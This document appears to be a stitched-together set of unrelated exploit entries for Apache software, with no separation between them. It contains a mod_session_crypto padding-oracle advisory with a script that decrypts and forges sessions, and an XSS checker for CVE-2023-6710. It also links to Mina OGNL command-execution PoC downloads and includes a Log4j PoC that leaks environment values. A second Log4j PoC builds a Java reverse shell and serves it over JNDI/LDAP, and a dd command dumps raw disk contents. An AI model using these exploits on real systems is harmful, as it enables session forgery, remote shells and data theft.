Vendor URL: https://httpd.apache.org/docs/trunk/mod/mod_session_crypto.html
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-001.txt
Advisory Status: published
CVE: CVE-2016-0736
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0736
Introduction
============
The module mod_session_crypto of the Apache HTTP Server can be used in
conjunction with the modules mod_session and mod_session_cookie to store
session data in an encrypted cookie within the users' browsers. This
avoids server-side session state so that incoming HTTP requests can be
easily distributed amongst a number of application web servers which do
not need to share session state.
More Details
============
The module mod_session_crypto uses symmetric cryptography to encrypt and
decrypt session data and uses mod_session to store the encrypted data in
a cookie (usually called "session") within the user's browser. The
decrypted session is then made available to the application in an
environment variable (in case of a CGI script) or in a custom HTTP
request header. The application can add a custom HTTP response header
(usually "X-Replace-Session") which instructs the HTTP server to replace
the session's content with the value of the header. Detailed
instructions to set up mod_session and mod_session_crypto can be found
in the documentation:
https://httpd.apache.org/docs/2.4/mod/mod_session.html#basicexamples
The module mod_session_crypto is configured to use either 3DES or AES
with various key sizes, defaulting to AES256. Encryption is handled by
the function "encrypt_string":
modules/session/mod_session_crypto.c
------------------------------------------------------------------------
/**
* Encrypt the string given as per the current config.
*
* Returns APR_SUCCESS if successful.
*/
static apr_status_t encrypt_string(request_rec * r, const apr_crypto_t *f,
session_crypto_dir_conf *dconf, const char *in, char **out)
{
[...]
apr_crypto_key_t *key = NULL;
[...]
const unsigned char *iv = NULL;
[...]
/* use a uuid as a salt value, and prepend it to our result */
apr_uuid_get(&salt);
[...]
res = apr_crypto_passphrase(&key, &ivSize, passphrase,
strlen(passphrase),
(unsigned char *) (&salt), sizeof(apr_uuid_t),
*cipher, APR_MODE_CBC, 1, 4096, f, r->pool);
[...]
res = apr_crypto_block_encrypt_init(&block, &iv, key, &blockSize, r->pool);
[...]
res = apr_crypto_block_encrypt(&encrypt, &encryptlen, (unsigned char *)in,
strlen(in), block);
[...]
res = apr_crypto_block_encrypt_finish(encrypt + encryptlen, &tlen, block);
[...]
/* prepend the salt and the iv to the result */
combined = apr_palloc(r->pool, ivSize + encryptlen + sizeof(apr_uuid_t));
memcpy(combined, &salt, sizeof(apr_uuid_t));
memcpy(combined + sizeof(apr_uuid_t), iv, ivSize);
memcpy(combined + sizeof(apr_uuid_t) + ivSize, encrypt, encryptlen);
/* base64 encode the result */
base64 = apr_palloc(r->pool, apr_base64_encode_len(ivSize + encryptlen +
sizeof(apr_uuid_t) + 1)
* sizeof(char));
[...]
return res;
}
------------------------------------------------------------------------
The source code shows that an encryption key is derived from the
configured password and a randomly chosen salt by calling the function
"apr_crypto_passphrase". This function internally uses PBKDF2 to derive
the key. The data is then encrypted and the salt and IV prepended to the
encrypted data. Before returning to the caller, the result is encoded as
base64.
This procedure does not guarantee integrity of the ciphertext, so the
Apache module is unable to detect whether a session sent back to the
server has been tampered with. Depending on the application this often
means that attackers are able to exploit a Padding Oracle vulnerability.
This allows decrypting the session and encrypting arbitrary data chosen
by the attacker.
Proof of Concept
================
The vulnerability can be reproduced as follows. First, the modules
mod_session, mod_session_crypto and mod_session_cookie are enabled and
configured:
------------------------------------------------------------------------
Session On
SessionEnv On
SessionCookieName session path=/
SessionHeader X-Replace-Session
SessionCryptoPassphrase RedTeam
------------------------------------------------------------------------
In addition, CGI scripts are enabled for a folder and the following CGI
script is saved as "status.rb" and is made available to clients:
------------------------------------------------------------------------
#!/usr/bin/env ruby
require 'cgi'
cgi = CGI.new
data = CGI.parse(ENV['HTTP_SESSION'])
if data.has_key? 'username'
puts
puts "your username is %s" % data['username']
exit
end
puts "X-Replace-Session: username=guest×tamp=" + Time.now.strftime("%s")
puts
puts "not logged in"
------------------------------------------------------------------------
Once the CGI script is correctly set up, the command-line HTTP client curl
can be used to access it:
------------------------------------------------------------------------
$ curl -i http://127.0.0.1:8080/cgi-bin/status.rb
HTTP/1.1 200 OK
Date: Tue, 19 Jan 2016 13:23:19 GMT
Server: Apache/2.4.10 (Ubuntu)
Set-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ
l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/
Cache-Control: no-cache
Set-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ
l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/
Transfer-Encoding: chunked
Content-Type: application/x-ruby
not logged in
------------------------------------------------------------------------
The example shows that a new encrypted cookie with the name "session" is
returned, and the response body contains the text "not logged in".
Calling the script again with the cookie just returned reveals that the
username in the session is set to "guest":
------------------------------------------------------------------------
$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\
LQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU= \
http://127.0.0.1:8080/cgi-bin/status.rb
your username is guest
------------------------------------------------------------------------
Sending a modified cookie ending in "u=" instead of "U=" will invalidate
the padding at the end of the ciphertext, so the session cannot be
decrypted correctly and is therefore not passed to the CGI script, which
returns the text "not logged in" again:
------------------------------------------------------------------------
$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\
LQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRu= \
http://127.0.0.1:8080/cgi-bin/status.rb
not logged in
------------------------------------------------------------------------
This verifies the existence of the Padding Oracle vulnerability. The
Python library[1] python-paddingoracle was then used to implement
decrypting the session by exploiting the Padding Oracle vulnerability.
exploit.py
------------------------------------------------------------------------
'''
from paddingoracle import BadPaddingException, PaddingOracle
from base64 import b64encode, b64decode
import requests
class PadBuster(PaddingOracle):
def __init__(self, valid_cookie, **kwargs):
super(PadBuster, self).__init__(**kwargs)
self.wait = kwargs.get('wait', 2.0)
self.valid_cookie = valid_cookie
def oracle(self, data, **kwargs):
v = b64encode(self.valid_cookie+data)
response = requests.get('http://127.0.0.1:8080/cgi-bin/status.rb',
cookies=dict(session=v), stream=False, timeout=5, verify=False)
if 'username' in response.content:
logging.debug('No padding exception raised on %r', v)
return
raise BadPaddingException
if __name__ == '__main__':
import logging
import sys
if not sys.argv[2:]:
print 'Usage: [encrypt|decrypt] <session value> <plaintext>'
sys.exit(1)
logging.basicConfig(level=logging.WARN)
mode = sys.argv[1]
session = b64decode(sys.argv[2])
padbuster = PadBuster(session)
if mode == "decrypt":
cookie = padbuster.decrypt(session[32:], block_size=16, iv=session[16:32])
print('Decrypted session:\n%r' % cookie)
elif mode == "encrypt":
key = session[0:16]
plaintext = sys.argv[3]
s = padbuster.encrypt(plaintext, block_size=16)
data = b64encode(key+s[0:len(s)-16])
print('Encrypted session:\n%s' % data)
else:
print "invalid mode"
sys.exit(1)
'''
------------------------------------------------------------------------
This Python script can then be used to decrypt the session:
------------------------------------------------------------------------
$ time python exploit.py decrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\
Hztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=
Decrypted session:
b'username=guest×tamp=1453282205\r\r\r\r\r\r\r\r\r\r\r\r\r'
real 6m43.088s
user 0m15.464s
sys 0m0.976s
------------------------------------------------------------------------
In this sample application, the username and a timestamp are included in
the session data. The Python script can also be used to encrypt a new
session containing the username "admin":
------------------------------------------------------------------------
$ time python exploit.py encrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\
Hztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYB\
RU= username=admin
Encrypted session:
sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7zmQ/GLFjF4pcXY
real3m38.002s
users0m8.536s
sys0m0.512s
------------------------------------------------------------------------
Sending this newly encrypted session to the server shows that the
username is now "admin":
------------------------------------------------------------------------
$ curl -b session=sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7\
zmQ/GLFjF4pcXY http://127.0.0.1:8080/cgi-bin/status.rb
your username is admin
------------------------------------------------------------------------
Workaround
==========
Use a different means to store the session, e.g. in a database by using
mod_session_dbd.
Fix
===
Update to Apache HTTP version 2.4.25 (see [2]).
Security Risk
=============
Applications which use mod_session_crypto usually store sensitive values
in the session and rely on an attacker's inability to decrypt or modify
the session. Successful exploitation of the Padding Oracle vulnerability
subverts this mechanism and allows to construct sessions with arbitrary
attacker-specified content. Depending on the application this may
completely subvert the application's security. Therefore, this
vulnerability poses a high risk.
Timeline
========
2016-01-11 Vulnerability identified
2016-01-12 Customer approved disclosure to vendor
2016-01-12 CVE number requested
2016-01-20 Vendor notified
2016-01-22 Vendor confirmed the vulnerability
2016-02-03 Vendor provided patch
2016-02-04 Apache Security Team assigned CVE number
2016-03-03 Requested status update from vendor, no response
2016-05-02 Requested status update from vendor, no response
2016-07-14 Requested status update and roadmap from vendor
2016-07-21 Vendor confirms working on a new released and inquired whether the
patch fixes the vulnerability
2016-07-22 RedTeam confirms
2016-08-24 Requested status update from vendor
2016-08-29 Vendor states that there is no concrete timeline
2016-12-05 Vendor announces a release
2016-12-20 Vendor released fixed version
2016-12-23 Advisory released
References
==========
[1] https://github.com/mwielgoszewski/python-paddingoracle
[2] http://httpd.apache.org/security/vulnerabilities_24.html
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
'''
import requests
import argparse
from bs4 import BeautifulSoup
from urllib.parse import urlparse, parse_qs, urlencode, urlunparse
from requests.exceptions import RequestException
class Colors:
RED = '\033[91m'
GREEN = '\033[1;49;92m'
RESET = '\033[0m'
def get_cluster_manager_url(base_url, path):
print(Colors.GREEN + f"Preparing the groundwork for the exploitation on {base_url}..." + Colors.RESET)
try:
response = requests.get(base_url + path)
response.raise_for_status()
except requests.exceptions.RequestException as e:
print(Colors.RED + f"Error: {e}" + Colors.RESET)
return None
print(Colors.GREEN + f"Starting exploit check on {base_url}..." + Colors.RESET)
if response.status_code == 200:
print(Colors.GREEN + f"Check executed successfully on {base_url}..." + Colors.RESET)
# Use BeautifulSoup to parse the HTML content
soup = BeautifulSoup(response.text, 'html.parser')
# Find all 'a' tags with 'href' attribute
all_links = soup.find_all('a', href=True)
# Search for the link containing the Alias parameter in the href attribute
cluster_manager_url = None
for link in all_links:
parsed_url = urlparse(link['href'])
query_params = parse_qs(parsed_url.query)
alias_value = query_params.get('Alias', [None])[0]
if alias_value:
print(Colors.GREEN + f"Alias value found" + Colors.RESET)
cluster_manager_url = link['href']
break
if cluster_manager_url:
print(Colors.GREEN + f"Preparing the injection on {base_url}..." + Colors.RESET)
return cluster_manager_url
else:
print(Colors.RED + f"Error: Alias value not found on {base_url}..." + Colors.RESET)
return None
print(Colors.RED + f"Error: Unable to get the initial step on {base_url}")
return None
def update_alias_value(url):
parsed_url = urlparse(url)
query_params = parse_qs(parsed_url.query, keep_blank_values=True)
query_params['Alias'] = ["<DedSec-47>"]
updated_url = urlunparse(parsed_url._replace(query=urlencode(query_params, doseq=True)))
print(Colors.GREEN + f"Injection executed successfully on {updated_url}" + Colors.RESET)
return updated_url
def check_response_for_value(url, check_value):
response = requests.get(url)
if check_value in response.text:
print(Colors.RED + "Website is vulnerable POC by :")
print(Colors.GREEN + """
____ _ ____ _ _ _____
| _ \ ___ __| / ___| ___ ___ | || |___ |
| | | |/ _ \/ _` \___ \ / _ \/ __| ____| || | / /
| |_| | __/ (_| |___) | __/ (_ |____|__ | / /
|____/ \___|\__,_|____/ \___|\___| |_|/_/
github.com/DedSec-47 """)
else:
print(Colors.GREEN + "Website is not vulnerable POC by :")
print(Colors.GREEN + """
____ _ ____ _ _ _____
| _ \ ___ __| / ___| ___ ___ | || |___ |
| | | |/ _ \/ _` \___ \ / _ \/ __| ____| || | / /
| |_| | __/ (_| |___) | __/ (_ |____|__ | / /
|____/ \___|\__,_|____/ \___|\___| |_|/_/
github.com/DedSec-47 """)
def main():
# Create a command-line argument parser
parser = argparse.ArgumentParser(description="python CVE-2023-6710.py -t https://example.com -u /cluster-manager")
# Add a command-line argument for the target (-t/--target)
parser.add_argument('-t', '--target', help='Target domain (e.g., https://example.com)', required=True)
# Add a command-line argument for the URL path (-u/--url)
parser.add_argument('-u', '--url', help='URL path (e.g., /cluster-manager)', required=True)
# Parse the command-line arguments
args = parser.parse_args()
# Get the cluster manager URL from the specified website
cluster_manager_url = get_cluster_manager_url(args.target, args.url)
# Check if the cluster manager URL is found
if cluster_manager_url:
# Modify the URL by adding the cluster manager value
modified_url = args.target + cluster_manager_url
modified_url = update_alias_value(args.target + cluster_manager_url)
print(Colors.GREEN + "Check executed successfully" + Colors.RESET)
# Check the response for the value "<DedSec-47>"
check_response_for_value(modified_url, "<DedSec-47>")
if __name__ == "__main__":
main()
Source: https://remoteawesomethoughts.blogspot.com/2016/09/apache-mina-2013-remote-command.html
Apache Mina 2.0.13 uses the OGNL library in the “IoSessionFinder” class. Its constructor takes into parameter one OGNL expression. Then this expression is executed when the method “find” is called. This class seems to be only used in the JMX MINA component “IoServiceMBean”. When the IOServiceMBean is exposed trough JMX it is possible to abuse the function to execute an arbitrary command on the server.
**PoC.zip**
https://drive.google.com/open?id=0ByB_ASBOdiURbVBHMjFxeldmSDg
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40382-1.zip
**MinaJMXConsole.zip**
https://drive.google.com/file/d/0ByB_ASBOdiURQjVCTlYtREotVnM/view
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40382-2.zip
# Exploit Title: Apache Log4j2 2.14.1 - Information Disclosure
# Date: 12/12/2021
# Exploit Author: leonjza
# Vendor Homepage: https://logging.apache.org/log4j/2.x/
# Version: <= 2.14.1
# CVE: CVE-2021-44228
#!/usr/bin/env python3
# Pure python ENV variable leak PoC for CVE-2021-44228
# Original PoC: https://twitter.com/Black2Fan/status/1470281005038817284
#
# 2021 @leonjza
import argparse
import socketserver
import threading
import time
import requests
LDAP_HEADER = b'\x30\x0c\x02\x01\x01\x61\x07\x0a\x01\x00\x04\x00\x04\x00\x0a'
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self) -> None:
print(f' i| new connection from {self.client_address[0]}')
sock = self.request
sock.recv(1024)
sock.sendall(LDAP_HEADER)
data = sock.recv(1024)
data = data[9:] # strip header
# example response
#
# ('Java version 11.0.13\n'
# '\x01\x00\n'
# '\x01\x03\x02\x01\x00\x02\x01\x00\x01\x01\x00\x0b'
# 'objectClass0\x00\x1b0\x19\x04\x172.16.840.1.113730.3.4.2')
data = data.decode(errors='ignore').split('\n')[0]
print(f' v| extracted value: {data}')
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
def main():
parser = argparse.ArgumentParser(description='a simple log4j
<=2.14 information disclosure poc '
'(ref:
https://twitter.com/Black2Fan/status/1470281005038817284)')
parser.add_argument('--target', '-t', required=True, help='target uri')
parser.add_argument('--listen-host', default='0.0.0.0',
help='exploit server host to listen on
(default: 127.0.0.1)')
parser.add_argument('--listen-port', '-lp', default=8888,
help='exploit server port to listen on (default: 8888)')
parser.add_argument('--exploit-host', '-eh', required=True,
default='127.0.0.1',
help='host where (this) exploit server is reachable')
parser.add_argument('--leak', '-l', default='${java:version}',
help='value to leak. '
'see:
https://twitter.com/Rayhan0x01/status/1469571563674505217 '
'(default: ${java:version})')
args = parser.parse_args()
print(f' i| starting server on {args.listen_host}:{args.listen_port}')
server = ThreadedTCPServer((args.listen_host, args.listen_port),
ThreadedTCPRequestHandler)
serv_thread = threading.Thread(target=server.serve_forever)
serv_thread.daemon = True
serv_thread.start()
time.sleep(1)
print(f' i| server started')
payload = f'${{jndi:ldap://{args.exploit_host}:{args.listen_port}/{args.leak}}}'
print(f' i| sending exploit payload {payload} to {args.target}')
try:
r = requests.get(args.target, headers={'User-Agent': payload})
print(f' i| response status code: {r.status_code}')
print(f' i| response: {r.text}')
except Exception as e:
print(f' e| failed to make request: {e}')
finally:
server.shutdown()
server.server_close()
if __name__ == '__main__':
main()
# Exploit Title: Apache Log4j 2 - Remote Code Execution (RCE)
# Date: 11/12/2021
# Exploit Authors: kozmer, z9fr, svmorris
# Vendor Homepage: https://logging.apache.org/log4j/2.x/
# Software Link: https://github.com/apache/logging-log4j2
# Version: versions 2.0-beta-9 and 2.14.1.
# Tested on: Linux
# CVE: CVE-2021-44228
# Github repo: https://github.com/kozmer/log4j-shell-poc
import subprocess
import sys
import argparse
from colorama import Fore, init
import subprocess
import threading
from http.server import HTTPServer, SimpleHTTPRequestHandler
init(autoreset=True)
def listToString(s):
str1 = ""
try:
for ele in s:
str1 += ele
return str1
except Exception as ex:
parser.print_help()
sys.exit()
def payload(userip , webport , lport):
genExploit = (
"""
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class Exploit {
public Exploit() throws Exception {
String host="%s";
int port=%s;
String cmd="/bin/sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) {
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
}
catch (Exception e){
}
};
p.destroy();
s.close();
}
}
""") % (userip, lport)
# writing the exploit to Exploit.java file
try:
f = open("Exploit.java", "w")
f.write(genExploit)
f.close()
print(Fore.GREEN + '[+] Exploit java class created success')
except Exception as e:
print(Fore.RED + f'[-] Something went wrong {e.toString()}')
checkJavaAvailible()
print(Fore.GREEN + '[+] Setting up fake LDAP server\n')
# create the LDAP server on new thread
t1 = threading.Thread(target=createLdapServer, args=(userip,webport))
t1.start()
# start the web server
httpd = HTTPServer(('localhost', int(webport)), SimpleHTTPRequestHandler)
httpd.serve_forever()
def checkJavaAvailible():
javaver = subprocess.call(['./jdk1.8.0_20/bin/java', '-version'], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
if(javaver != 0):
print(Fore.RED + '[-] Java is not installed inside the repository ')
sys.exit()
def createLdapServer(userip, lport):
sendme = ("${jndi:ldap://%s:1389/a}") % (userip)
print(Fore.GREEN +"[+] Send me: "+sendme+"\n")
subprocess.run(["./jdk1.8.0_20/bin/javac", "Exploit.java"])
url = "
http://{}:{}/#Exploit".format
(userip, lport)
subprocess.run(["./jdk1.8.0_20/bin/java", "-cp",
"target/marshalsec-0.0.3-SNAPSHOT-all.jar", "marshalsec.jndi.LDAPRefServer", url])
def header():
print(Fore.BLUE+"""
[!] CVE: CVE-2021-44228
[!] Github repo:
https://github.com/kozmer/log4j-shell-poc
""")
if __name__ == "__main__":
header()
try:
parser = argparse.ArgumentParser(description='please enter the values ')
parser.add_argument('--userip', metavar='userip', type=str,
nargs='+', help='Enter IP for LDAPRefServer & Shell')
parser.add_argument('--webport', metavar='webport', type=str,
nargs='+', help='listener port for HTTP port')
parser.add_argument('--lport', metavar='lport', type=str,
nargs='+', help='Netcat Port')
args = parser.parse_args()
#print(args.userip)
payload(listToString(args.userip), listToString(args.webport), listToString(args.lport))
except KeyboardInterrupt:
print(Fore.RED + "user interupted the program.")
sys.exit(0)
source: https://www.securityfocus.com/bid/64617/info
Apache Libcloud is prone to a local information-disclosure vulnerability.
Local attackers can exploit this issue to obtain sensitive information. Information obtained may lead to further attacks.
Apache Libcloud versions 0.12.3 through 0.13.2 are vulnerable.
dd if=/dev/vda bs=1M | strings -n 100 > out.txt